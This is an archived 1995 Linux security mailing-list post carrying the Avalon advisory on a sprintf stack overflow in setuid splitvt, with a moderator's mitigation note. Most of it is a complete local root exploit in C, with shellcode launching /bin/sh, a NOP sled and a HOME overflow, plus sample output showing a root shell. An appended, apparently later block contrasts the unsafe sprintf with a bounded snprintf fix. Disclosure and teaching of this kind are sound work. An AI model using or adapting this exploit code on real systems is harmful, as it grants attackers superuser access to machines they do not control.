[515] in linux-security and linux-alert archive


Avalon Release

daemon@ATHENA.MIT.EDU (root)
Tue Dec 12 08:00:17 1995

Date: Sun, 3 Dec 1995 22:52:37 -0700 (MST)
From: root <root@crimson.cadvision.com>
To: Jeff Uphoff <juphoff@tarsier.cv.nrao.edu>
cc: linux-alert@tarsier.cv.nrao.edu, linux-security@tarsier.cv.nrao.edu,
        bugtraq@crimelab.com, big-linux@netspace.org
In-Reply-To: <199512040028.TAA06752@tarsier.cv.nrao.edu>
Reply-To: linux-security@tarsier.cv.nrao.edu


[mod: This should have been approved to linux-alert a few days ago, but it
      somehow escaped me. I'm very sorry for the delay.

      At least Slackware 3.0 seems affected (but it doesn't seem to work
      for all users alike).  Red Hat doesn't have splitvt; the status of
      other systems is not known.  The simplest fix is to remove the
      setuid bit from splitvt.
								--okir]


		      Avalon Security Research 
			    Release 1.3
			     (splitvt)

Affected Program: splitvt(1)

Affected Operating Systems: Linux 2-3.X

Exploitation Result: Local users can obtain superuser privileges.

Bug Synopsis: A stack overflow exists: user-supplied data is passed,
unbounded and unchecked, to a sprintf().

Syntax: 
crimson~$ cc -o sp sp.c
crimson~$ sp
bash$ sp
bash$ splitvt
bash# whoami
root

Credit: Full credit for this bug (both the research and the code)
goes to Dave G. & Vic M.  Any questions should be directed to
mcpheea@cadvision.com . 

----------------------------------------------------------------------------


#include <stdlib.h>	/* putenv(), system() */

long get_esp(void)
{
/* i386 only: leaves the current stack pointer in %eax as the return value */
__asm__("movl %esp,%eax\n");
}
int main(void)
{
  char eggplant[2048];
  int a;
  char *egg;
  long *egg2;
  char realegg[] =
"\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"
"\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"
"\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh";
  char *eggie = realegg;

  egg = eggplant;

  *(egg++) = 'H';
  *(egg++) = 'O';
  *(egg++) = 'M';
  *(egg++) = 'E';
  *(egg++) = '=';

  egg2 = (long *)egg;

  for (a=0;a<(256+8)/4;a++) *(egg2++) = get_esp() + 0x3d0 + 0x30;

  egg=(char *)egg2;

  for (a=0;a<0x40;a++) *(egg++) = 0x90;

  while (*eggie)
    *(egg++) = *(eggie++);
  *egg = 0; /* terminate eggplant! */

  putenv(eggplant);

  system("/bin/bash");
}
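The pattern the synopsis describes and its bounded counterpart, as an added example that is not the advisory's code and not splitvt's own source: the rc-file path, the buffer size and the input values are constructed for illustration, and the string formatted into the stack buffer is assumed to come from HOME as the exploit above does.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define PATH_BUF 256   /* constructed: size of the fixed stack buffer */

/* The pattern the advisory describes (hypothetical rc-file path, not
 * splitvt's real code): an environment-derived string is sprintf()'d into
 * a fixed-size buffer, so any HOME longer than the buffer writes past its
 * end. Shown for contrast only; nothing here calls it. */
void rcfile_path_unsafe(const char *home, char *out)
{
    sprintf(out, "%s/.rcfile", home);   /* no length check at all */
}

/* Hardened form (home is what a setuid program gets from getenv("HOME")):
 * snprintf() bounds the write and returns the length the full string
 * needed; n >= outsz means it did not fit, and the caller refuses the
 * value instead of silently truncating. Returns 0 = ok, -1 = rejected. */
int rcfile_path_safe(const char *home, char *out, size_t outsz)
{
    int n;
    if (home == NULL || outsz == 0)
        return -1;
    n = snprintf(out, outsz, "%s/.rcfile", home);
    if (n < 0 || (size_t)n >= outsz) {
        out[0] = '\0';
        return -1;
    }
    return 0;
}

/* Checks with constructed inputs: a short HOME is accepted verbatim,
 * an oversize one (2 * PATH_BUF bytes) is refused and the buffer cleared. */
int safe_accepts_short_home(void)
{
    char out[PATH_BUF];
    return rcfile_path_safe("/home/alice", out, sizeof out) == 0
        && strcmp(out, "/home/alice/.rcfile") == 0;
}

int safe_rejects_long_home(void)
{
    char out[PATH_BUF], home[2 * PATH_BUF];
    memset(home, 'A', sizeof home - 1);
    home[sizeof home - 1] = '\0';
    return rcfile_path_safe(home, out, sizeof out) == -1 && out[0] == '\0';
}
```

Rejecting an oversize value, rather than truncating it, is what keeps a setuid program from ever acting on a path it did not fully check.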


